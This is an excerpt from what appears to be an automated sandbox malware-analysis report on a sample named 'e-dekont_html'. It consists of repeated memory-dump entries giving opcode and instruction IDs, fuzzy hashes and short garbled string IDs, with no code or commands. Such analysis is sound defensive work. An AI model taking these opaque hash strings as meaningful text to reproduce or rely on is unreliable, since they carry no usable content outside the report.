                                                                                                                                                          • Instruction Fuzzy Hash: EFA1B575E00218DFDB14DFA9D884A9DBBB2FF89310F1480AAE409AB365DB319981CF55
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: ed9bd72674e4eaa26c26961f53dcd8b92ce928f8fa29c68dda5f63f88a12201f
                                                                                                                                                          • Instruction ID: 6c399a0a069fc647f9bdc1fa28645b2811d024cf3fc5c0f6e7030e970a42bf8c
                                                                                                                                                          • Opcode Fuzzy Hash: ed9bd72674e4eaa26c26961f53dcd8b92ce928f8fa29c68dda5f63f88a12201f
                                                                                                                                                          • Instruction Fuzzy Hash: 0791B374E00218DFDB14DFA9D994A9DBBF2BF89304F1580A9E809AB365DB309985CF50
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: 52d5544e1aa438a13672cb51116bf6bc6c56078a8fc526dc1a0c456dfcddc460
                                                                                                                                                          • Instruction ID: ac435fe4470be30c6e165f987b8d8c41f0ff81aa2dd5c9094533b5371d3b05ad
                                                                                                                                                          • Opcode Fuzzy Hash: 52d5544e1aa438a13672cb51116bf6bc6c56078a8fc526dc1a0c456dfcddc460
                                                                                                                                                          • Instruction Fuzzy Hash: 17819574E01218DFDB54DFA9D994A9DBBF2BF88300F1490AAE419AB365DB309981CF50
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: 8207d6b3ee377afe12aa891935e60f3ea849ffe4dfb01a5adf92edca37e6d6c1
                                                                                                                                                          • Instruction ID: 53d33ffca7f0b5dcc1af5c81e72d038b9134aeefb057695d37ecd6d37081177a
                                                                                                                                                          • Opcode Fuzzy Hash: 8207d6b3ee377afe12aa891935e60f3ea849ffe4dfb01a5adf92edca37e6d6c1
                                                                                                                                                          • Instruction Fuzzy Hash: 5681A274E00218DFDF14DFAAD984A9DBBF2BF89310F1480A9E409AB365DB709981CF51
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: 553e9cc42f6ea59341863b318b9b308fbd481e195755badae0277a1de717f0da
                                                                                                                                                          • Instruction ID: db80aac3f7b838c158830672a85a680772429b6873ebb9c8b5901509b069e152
                                                                                                                                                          • Opcode Fuzzy Hash: 553e9cc42f6ea59341863b318b9b308fbd481e195755badae0277a1de717f0da
                                                                                                                                                          • Instruction Fuzzy Hash: F9819374E00218DFDB14DFA9D984A9DBBF2BF89300F14D0AAE419AB355DB30A985CF51
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: 0e1d152b8784409c87864b2e63350e2b33c65ae8df630c6e894d774b5c632799
                                                                                                                                                          • Instruction ID: 89a52101ab946d90c579fc1915b987963a2184ed9e0be45fd553e9841128d74c
                                                                                                                                                          • Opcode Fuzzy Hash: 0e1d152b8784409c87864b2e63350e2b33c65ae8df630c6e894d774b5c632799
                                                                                                                                                          • Instruction Fuzzy Hash: 6A819474E00219CFDB18DFA9D984A9DBBF2BF89300F14D0A9E419AB365DB709981CF50
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: f8262f2c5d56b5ee7c58b4330535565aa9d4b4191a971c78be67e4bf124601b9
                                                                                                                                                          • Instruction ID: 8d5b45edf354c6f224aed2bd6e84dd73e84ad3153e08e45a8ee0b8b859f667b7
                                                                                                                                                          • Opcode Fuzzy Hash: f8262f2c5d56b5ee7c58b4330535565aa9d4b4191a971c78be67e4bf124601b9
                                                                                                                                                          • Instruction Fuzzy Hash: 5B8195B5E00218DFDB14DFA9D984A9EBBF2FF89310F1490AAE419AB355DB309941CF50
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: dc935311010fbaab3767859429d5cb5a6ccc20ef468599c6686f15678982934a
                                                                                                                                                          • Instruction ID: 27d87ae74820eba1b2b3796f3b53013bc7c1655f1b0cc8378041b46575b222bb
                                                                                                                                                          • Opcode Fuzzy Hash: dc935311010fbaab3767859429d5cb5a6ccc20ef468599c6686f15678982934a
                                                                                                                                                          • Instruction Fuzzy Hash: E0819474E00218DFDB54DFAAD984A9DBBF2BF88310F14D0AAE459AB355DB309981CF50
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (ofq$4'fq$4'fq$4'fq
                                                                                                                                                          • API String ID: 0-1260671024
                                                                                                                                                          • Opcode ID: c87e83d65bbc2e579dc941cbf9c5fcd1cea07171084e3b7be480ae4d4289b4e4
                                                                                                                                                          • Instruction ID: 35f486a1cdce6f08632d19d3902a013e58ff5e22ec5f2d3b11242f6d52fee641
                                                                                                                                                          • Opcode Fuzzy Hash: c87e83d65bbc2e579dc941cbf9c5fcd1cea07171084e3b7be480ae4d4289b4e4
                                                                                                                                                          • Instruction Fuzzy Hash: EDA28E71A002099FCF15CF68C984AAEBBB6FF88304F1585A9E4169B365D730ED85CB91
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (ofq$(ofq$,jq$,jq
                                                                                                                                                          • API String ID: 0-1018418033
                                                                                                                                                          • Opcode ID: c6ae7dd71a6c190fac0f1f0e4ec1708b6235e68be1a20b6cbd1a2b3776321555
                                                                                                                                                          • Instruction ID: bf3e440c2d29d9e79cf6f890c0c38d988874b9f96d30c29915ed0eb4fa94f21b
                                                                                                                                                          • Opcode Fuzzy Hash: c6ae7dd71a6c190fac0f1f0e4ec1708b6235e68be1a20b6cbd1a2b3776321555
                                                                                                                                                          • Instruction Fuzzy Hash: FBE12B70A00119DFCF15CFA9D984AADFBF2FF49304F5981A5E806AB265DB30E841DB50
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (ofq$Hjq
                                                                                                                                                          • API String ID: 0-2051923243
                                                                                                                                                          • Opcode ID: 35f485c4d5a3aa471a04ac523a69bbe7ff93e984cd14ad4424cbba9ebd9e8f00
                                                                                                                                                          • Instruction ID: 1c9680421d83e50e765235910acb9a33dc06816a85131d63f90bfe52c79faaa5
                                                                                                                                                          • Opcode Fuzzy Hash: 35f485c4d5a3aa471a04ac523a69bbe7ff93e984cd14ad4424cbba9ebd9e8f00
                                                                                                                                                          • Instruction Fuzzy Hash: 5D126B70A002199FDB14DFA9C854BAEBBF6FF98304F2085A9E5069B395DF309D45CB90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 644e969b1883adf43f3f50d585e76b8d5080263bfc922b7094ae86a624462dc1
                                                                                                                                                          • Instruction ID: 8604d11276e117fb7e75a77a59aa6e4f80baf038dfe61648d03548f8dc0fea26
                                                                                                                                                          • Opcode Fuzzy Hash: 644e969b1883adf43f3f50d585e76b8d5080263bfc922b7094ae86a624462dc1
                                                                                                                                                          • Instruction Fuzzy Hash: E9519475E00208DFDB18DFBAD494A9DBBB2FF89310F24906AE915AB364DB305941CF14
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3b8a7aad2b4ebd23c9d5e8c98ab9cd4c561642b7fc38bc0f43b9414f59a057b1
                                                                                                                                                          • Instruction ID: 29cfb718deae8b510f22a209be0b7cb08912e31ad698fff292c77859a0f75ff5
                                                                                                                                                          • Opcode Fuzzy Hash: 3b8a7aad2b4ebd23c9d5e8c98ab9cd4c561642b7fc38bc0f43b9414f59a057b1
                                                                                                                                                          • Instruction Fuzzy Hash: AA519374E00208DFDB18DFBAD584A9DBBB2FF89310F24916AE915AB364DB309941CF14
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (ofq$(ofq$(ofq$(ofq$(ofq$(ofq$,jq$,jq
                                                                                                                                                          • API String ID: 0-3756152659
                                                                                                                                                          • Opcode ID: 170eb8476239c3a52033ce0dd0b3fd498b57f78293fe121d551e4e7795411513
                                                                                                                                                          • Instruction ID: 319401f9ccb7b2ebfbbc338e05d6056b6deea4f8fff320950f9441830c84091a
                                                                                                                                                          • Opcode Fuzzy Hash: 170eb8476239c3a52033ce0dd0b3fd498b57f78293fe121d551e4e7795411513
                                                                                                                                                          • Instruction Fuzzy Hash: 5C123830A002099FCF14DF69D994AAEBBF2FF48314F148599E41ADB2A1DB30ED41DB90
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Hjq$Hjq
                                                                                                                                                          • API String ID: 0-2395847853
                                                                                                                                                          • Opcode ID: 1f2256973d65991783cdd12c732bf51f042e3d7ba800b719693f9fde7496de51
                                                                                                                                                          • Instruction ID: b406694420f0b07b2ffcf97d967db7918e04997f72fb2a450d5b0dc9cf7749b0
                                                                                                                                                          • Opcode Fuzzy Hash: 1f2256973d65991783cdd12c732bf51f042e3d7ba800b719693f9fde7496de51
                                                                                                                                                          • Instruction Fuzzy Hash: 7F91AD317042558FDF16AF34C894B6E7BA6FF98304F0489A9E5068B392CB349C45C792
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ,jq$,jq
                                                                                                                                                          • API String ID: 0-3554820393
                                                                                                                                                          • Opcode ID: 52024c5b7b5e5250d85fcba9557d8874ba8e5b2c77b1d6e20af69860e912b0a7
                                                                                                                                                          • Instruction ID: 0931e19477d12db2afab8cad2368d93b26884e298d52ba352530bb205bdb7a7b
                                                                                                                                                          • Opcode Fuzzy Hash: 52024c5b7b5e5250d85fcba9557d8874ba8e5b2c77b1d6e20af69860e912b0a7
                                                                                                                                                          • Instruction Fuzzy Hash: C8819CB0B10505CFCF14CF69C888AAABBFAFF99214B1581A9D506D73A5DB31EC41CB90
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Xjq$Xjq
                                                                                                                                                          • API String ID: 0-958142700
                                                                                                                                                          • Opcode ID: be36d8bd15c09f4508d2f9b4fdb7f26c7714bc4db764a10d5c6a58f33bb05fe5
                                                                                                                                                          • Instruction ID: 18d9b99c4f4c49fdbebdd0c39bc4a115e0e3ab650e685834a8ca03265bca2bc1
                                                                                                                                                          • Opcode Fuzzy Hash: be36d8bd15c09f4508d2f9b4fdb7f26c7714bc4db764a10d5c6a58f33bb05fe5
                                                                                                                                                          • Instruction Fuzzy Hash: BB31D335B003298BDF284A6A989437E66E6EBC4310F1484FEE817C3380DFB5CC4596A1
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e50c77be81576de4ced3d62c718af8bb0dc54cce0899c8af43012ff215076cd9
                                                                                                                                                          • Instruction ID: 7b6d3ccdae251686145d9ef3e4d8eb3e513f59b4f621e5341992e2523a4e0cfc
                                                                                                                                                          • Opcode Fuzzy Hash: e50c77be81576de4ced3d62c718af8bb0dc54cce0899c8af43012ff215076cd9
                                                                                                                                                          • Instruction Fuzzy Hash: 83418D707002558FDF00DF68C844B6E7BA6EB89311F44C4A6E909CB256D771ED49CB61
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5c64a450eb896dfaf18ea23b466834e1ef23667cb3ab4c13dd63fac923b2b40a
                                                                                                                                                          • Instruction ID: 6f39585048d47271ab2e74227a4dc470c2f56a1d495e2ad94ee745dd3c567f93
                                                                                                                                                          • Opcode Fuzzy Hash: 5c64a450eb896dfaf18ea23b466834e1ef23667cb3ab4c13dd63fac923b2b40a
                                                                                                                                                          • Instruction Fuzzy Hash: 5E31B07560110AEFCF15AFA4D858AAF3BA2FF88318F504465F91687384CB35CD65DBA0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9ba1e0d26dfd756cad5f0474e65d62891ee28046fe4033a2f73e9c71e339f000
                                                                                                                                                          • Instruction ID: 2f626540e003befa2e9845ef3cb601cae451bc9640c206de9157440009ce1d69
                                                                                                                                                          • Opcode Fuzzy Hash: 9ba1e0d26dfd756cad5f0474e65d62891ee28046fe4033a2f73e9c71e339f000
                                                                                                                                                          • Instruction Fuzzy Hash: 2221D034300A424BCF165B758568B3E27B6EFC4649B0885AAD50BCB2B9EF35C806E342
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 51615f68c246b5561ec3a7e9973f6b35d1b001b8b100d010cff5f341bf1ceb6e
                                                                                                                                                          • Instruction ID: a40aac48aaa75dee5ab2d2ffce507cbe4ea7d0d2e85e8a20cadea10753f92016
                                                                                                                                                          • Opcode Fuzzy Hash: 51615f68c246b5561ec3a7e9973f6b35d1b001b8b100d010cff5f341bf1ceb6e
                                                                                                                                                          • Instruction Fuzzy Hash: 25217C30300A024BDF155A658564B3E26BAEFC4759F1881B9D50BCB7B8EF76CC42E382
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 24c70f9b0d89088436f51a02eb8600d60321875d39e93e8111325aceeb9da52f
                                                                                                                                                          • Instruction ID: 00cdee0bc9961d2fa52f93d9f46191a49fd8d9cf278e9721528a94795bae146c
                                                                                                                                                          • Opcode Fuzzy Hash: 24c70f9b0d89088436f51a02eb8600d60321875d39e93e8111325aceeb9da52f
                                                                                                                                                          • Instruction Fuzzy Hash: 8621D1B1D05249CFCB15EFB8D9547AEBFB1FB45304F0495AAC004AB269EB304A45CB81
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c4a5e877c315c3ec95a6f737486771096b77818a54e18f6187f1f90809ce68e6
                                                                                                                                                          • Instruction ID: abad8e8ff7587c8091fa0d148faebd020d452c70459afd67265ef6828c1e8748
                                                                                                                                                          • Opcode Fuzzy Hash: c4a5e877c315c3ec95a6f737486771096b77818a54e18f6187f1f90809ce68e6
                                                                                                                                                          • Instruction Fuzzy Hash: 5A21A135E00115AFCF14DB34D940AAE77A9EBED360B50C569DD0A9B358DB30EA42CBD1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 10d98440f149cb2507bf512190a4d46a4446cb398ef7ac5eb177ddebe90495e8
                                                                                                                                                          • Instruction ID: 2376a342dca991e5742c9c140449ddcc526d1b5ba2a807666156781ec65cc6a4
                                                                                                                                                          • Opcode Fuzzy Hash: 10d98440f149cb2507bf512190a4d46a4446cb398ef7ac5eb177ddebe90495e8
                                                                                                                                                          • Instruction Fuzzy Hash: 4E2105357406118FCB199B29C458A2FB7A6FFD976570486A9E827CB398CF30DC02CB80
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4159801798.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_128d000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5211990f4286dd8b36cc68263352c855d2a1892713f95b405e853560746c113d
                                                                                                                                                          • Instruction ID: 187996859d9990af81ffdb70255c54e2313fca7c8156013b5c5a5dc1797ecf39
                                                                                                                                                          • Opcode Fuzzy Hash: 5211990f4286dd8b36cc68263352c855d2a1892713f95b405e853560746c113d
                                                                                                                                                          • Instruction Fuzzy Hash: DA2134B1514208EFDB15EF68C9C0B26BB65FB84314F20C96DE9494B2C2C77BD44BCA61
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7f97b6369b9ace6a43f5499a52f03d32c4f797688fa7e5af7401a1e70a04fb86
                                                                                                                                                          • Instruction ID: ad20ae747c44bdc99662a32a81c485850ede7604390258607745def448a281a7
                                                                                                                                                          • Opcode Fuzzy Hash: 7f97b6369b9ace6a43f5499a52f03d32c4f797688fa7e5af7401a1e70a04fb86
                                                                                                                                                          • Instruction Fuzzy Hash: 9131A874E11208DFCB44DFA8D5848ADBBF6FF49301B20546AE819AB368D731AD15CF00
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 07ce20e73511df3b58e4de6b4460a0444d39276ddc9245346eb09765697ba5cb
                                                                                                                                                          • Instruction ID: 532108549d9a2dbbfdbfe6e55db793bd32e30d31b69317b510be910464fe8d44
                                                                                                                                                          • Opcode Fuzzy Hash: 07ce20e73511df3b58e4de6b4460a0444d39276ddc9245346eb09765697ba5cb
                                                                                                                                                          • Instruction Fuzzy Hash: C221E4B5601109DFCF25AF64E4587AF3BA1EF48318F104469F9068B344CB35CD65DB90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: bd407c45f9fbc38da9f173435a81ad81fa41f37011a55195301ada47ff132974
                                                                                                                                                          • Instruction ID: d00f419d3e642be37da6ca62afa03d1aada9b4c480c23020635bd5614c0ddda3
                                                                                                                                                          • Opcode Fuzzy Hash: bd407c45f9fbc38da9f173435a81ad81fa41f37011a55195301ada47ff132974
                                                                                                                                                          • Instruction Fuzzy Hash: AE218B70E01249DFCF05DFA5D550AEEBFB6EF48205F2480AAE416E6390DB34E949DB60
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b02e8891236c33d8e946477e0bd43f29264252d5c91af66a3fbbf28388061091
                                                                                                                                                          • Instruction ID: f4433fe597a9163dafa9073e0b2bf8190615e475c43c737ddadba15e715be567
                                                                                                                                                          • Opcode Fuzzy Hash: b02e8891236c33d8e946477e0bd43f29264252d5c91af66a3fbbf28388061091
                                                                                                                                                          • Instruction Fuzzy Hash: C6217F72B001049BCF148F68D995BDDBBBAFF8C310F148569E916E7290DB719C15CB90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.4160774291.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_2be0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
